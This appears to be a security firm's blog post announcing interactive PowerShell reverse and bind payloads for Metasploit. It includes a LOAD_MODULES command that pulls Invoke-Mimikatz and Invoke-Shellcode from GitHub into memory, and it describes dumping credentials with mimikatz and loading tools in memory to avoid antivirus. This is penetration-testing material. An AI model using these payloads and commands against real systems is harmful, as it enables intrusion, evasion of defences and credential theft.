Loading A Weaponised Interactive PowerShell Session With Metasploit

PowerShell is rapidly becoming the go to post exploitation method for hackers, with a plethora of awesome PowerShell tools such as PowerSploit, PowerUp, PowerView and Nishang, to name a few. The standard PowerShell environment can be quickly extended into a hacker’s delight.

These ‘tools’ are written entirely in PowerShell and do not touch disk (largely) – therefore they are anti-virus (AV) friendly and do not involve risky process injections. However, it has not all been plain sailing – achieving a remote interactive PowerShell session (without the use of PSRemoteing or WinRM) has often been an inconvenience. As security professionals, here at Nettitude we are keen to solve this issue. At present, Metasploit offers some post PowerShell modules to execute scripts or standalone tools, but there is nothing like having an interactive shell.

Enter the new Interactive PowerShell payloads for Metasploit written by Nettitude consultants, Ben Turner (@benpturner) and Dave Hardy (@davehardy20).

These payloads offer the ability to have an interactive PowerShell session on an already compromised host, via the windows/local/payload_inject module (see Figure 1).

Figure 1 - Reverse session using new Interactive Powershell payload

Figure 1 – Reverse session using new Interactive Powershell payload

Alternatively, you can use the new payloads as a replacement for the normal Metasploit payloads, such as windows/meterpreter/reverse_tcp when using PSEXEC for example (See Figure 2).

Figure 2 - Executing powershell_bind_tcp through PSEXEC.

Figure 2 – Executing powershell_bind_tcp through PSEXEC.

The payloads provide not just an interactive PowerShell session, but can be remotely ‘weaponised’ with the modules of your choosing (i.e. PowerSploit, PowerTools). Just set the LOAD_MODULES option within the payload with a comma-separated string of a web server or local network location where the modules are hosted – handy if you don’t have Internet access.

For example, if you are lucky enough to have Internet access from your target, you can use the GitHub repositories directly like so:

Set LOAD_MODULES https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1,https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke–Shellcode.ps1,………..

Figure 3 - Fully weaponised PowerShell session

Figure 3 – Fully weaponised PowerShell session

As you can see in Figure 3, we now have an interactive PowerShell session in Metasploit and the console reports that it has loaded ten modules.

In total, there are actually four new Interactive PowerShell payloads, two that work for the processes above and two more that will work with msfvenom, or the generate option within msfconsole, which create standalone bind and reverse payloads that can be uploaded and executed separately (see Figure 4).

Figure 4 - Generating a powerShell_reverse_tcp payload

Figure 4 – Generating a powerShell_reverse_tcp payload

But we know the burning question is…’does mimikatz work this way?’…Well, yes it does. As with all things mimikatz you need to get hold of some SYSTEM privs somehow (but it’s Windows, so no dramas there). Then run the excellent PowerSploit ‘invoke-mimikatz’ commandlet in your newly weaponsied PowerShell session and BOOM! (Kudos to @JosephBialek, @gentilkiwi and @mattifestation for making this module a reality!)

Figure 5 - Mimikatz over PowerShell interactive Metasploit session

Figure 5 – Mimikatz over PowerShell interactive Metasploit session

The rest really is up to you!

“So where do I get this awesomeness?”
The PowerShell payloads are in the main Metasploit tree, so all you need to do is get the latest and greatest Metasploit Framework git version including commit – https://github.com/rapid7/metasploit-framework/pull/5194

Or if you are looking for the standalone scripts they are available here – https://github.com/nettitude/powershell

Happy hunting.

Background

Looking for something a bit more local or don’t have Metasploit? Read on!

As an extra to the Metasploit payloads and also to give some background to the work behind the module, we are publishing the initial scripts that were developed to ‘weaponise’ a standard windows PowerShell session. The PowerShell scripts were first used as Proof of Concept and early Metasploit modules.

These are essentially just loops that read the remote GitHub repository of PowerSploit, PowerView and PowerUp and use the PowerShell ‘download cradle’ method or ‘local’ web server version to retrieve the PowerShell modules (useful when there is no Internet access).

The scripts are as follows;

  • In-memory-downloader.ps1 – downloads and installs the modules into memory, no AV stress
  • Local-in-memory-downloader.ps1 – the local network version of the above, although this requires a local web server
  • Powersploit-downloader.ps1 – this script and the corresponding Powertools-downloader.ps1 download to disk and installs the modules. These are for systems with no Anti-Virus (which doesn’t detect the modules). Another reason for this method is that some of these tools will not run fully just in memory.

The scripts themselves are easy to use just copy and paste the download cradle command into an active PowerShell session (see Figure 6) on which the ‘in-memory-downloader.ps1’ script has been run.

Figure 6 - Executing in-memory-downloader.ps1

Figure 6 – Executing in-memory-downloader.ps1

Future Development

We will look to include SSL support for the payloads and hopefully create additional POST modules that work with the new Metasploit PowerShell session. Currently, we have not developed any at this time, as the integration of these modules was reliant on the new session type being integrated into Metasploit. As this has now been completed and approved in the core Metasploit framework we can start development for these modules.

 

 

To contact Nettitude’s editor, please email media@nettitude.com.

 

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *